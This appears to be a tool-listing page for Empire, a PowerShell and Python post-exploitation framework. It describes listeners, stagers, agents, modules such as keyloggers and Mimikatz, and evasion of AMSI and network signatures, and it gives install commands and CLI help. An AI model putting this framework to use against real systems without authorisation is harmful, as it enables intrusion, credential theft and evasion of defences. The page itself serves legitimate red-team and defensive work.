Empire: PowerShell Post-Exploitation Framework


Empire: PowerShell Post-Exploitation Framework

Empire is a post-exploitation framework that  combines the power of Powershell and Python to create a framework which can be used to deploy post-exploitation modules such as keyloggers or Mimikatz on the target systems. This Framework uses the power of cryptography to secure communications while also offering a flexible architecture.

Empire: PowerShell Post-Exploitation Framework Logo
PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016. BC-Security presented updates to further evade Microsoft Antimalware Scan Interface (AMSI) and JA3/S signatures at DEF CON 27.

Empire: PowerShell & Python3 Post-Exploitation Framework

After entering the main menu, the user will see the number of active agents, listeners and loaded modules. The first step normally is to set-up a local listener through the listener management menu. After this, the user can choose to set up various stagers including dlls, macros, one-liners and more. The user can also choose to perform commands through agents and check which infiltrated systems are online. Lastly, the user has the option to execute modules on different agents

Features:

  • includes a pure-PowerShell 2.0 Windows agent
  • Compatible with Python 3.x Linux/OS X agents
  • Deploy Post-Exploitation modules from keyloggers to Mimikatz.
  • Designed in a way to avoid detection

Supported Platforms:

  • Linux
  • Windows

Requirements:

  • Powershell
  • Python 3+

Install Empire

Linux

Clone the GitHub repo:

$ git clone https://github.com/BC-SECURITY/Empire.git

Navigate to the working directory and install:

$ cd Empire
$ sudo ./setup/install.sh

Kali Linux

Run the following command:

$ apt install powershell-empire

Docker

Using a pre-built docker container:

$ docker pull bcsecurity/empire:{version}
$ docker run -it bcsecurity/empire:{version}

# with persistent storage
$ docker pull bcsecurity/empire:{version}
$ docker create -v /empire --name data bcsecurity/empire:{version}
$ docker run -it --volumes-from data bcsecurity/empire:{version}

# if you prefer to be dropped into bash instead of directly into empire
$ docker run -it --volumes-from data bcsecurity/empire:{version} /bin/bash

Usage

Enter the following commands:

$ cd Empire
$ ./empire

Different switches within Empire

Use -h to list all available options:

$./empire -h
 usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]]
               [-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v]
               [--rest] [--restport [RESTPORT]] [--headless]
               [--username [USERNAME]] [--password [PASSWORD]]
  
 optional arguments:
   -h, --help            show this help message and exit
   --debug [DEBUG]       Debug level for output (default of 1).
   -s [STAGER], --stager [STAGER]
                         Specify a stager to generate. Lists all stagers if
                         none is specified.
   -o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]]
                         Supply options to set for a stager in OPTION=VALUE
                         format. Lists options if nothing is specified.
   -l [LISTENER], --listener [LISTENER]
                         Display listener options. Displays all listeners if
                         nothing is specified.
   -v, --version         Display current Empire version.
   --rest                Run the Empire RESTful API.
   --restport [RESTPORT]
                         Port to run the Empire RESTful API on.
   --headless            Run Empire and the RESTful API headless without the
                         usual interface.
   --username [USERNAME]
                         Start the RESTful API with the specified username
                         instead of pulling from empire.db
   --password [PASSWORD]
                         Start the RESTful API with the specified password
                         instead of pulling from empire.db 
Documentation Box
Download Box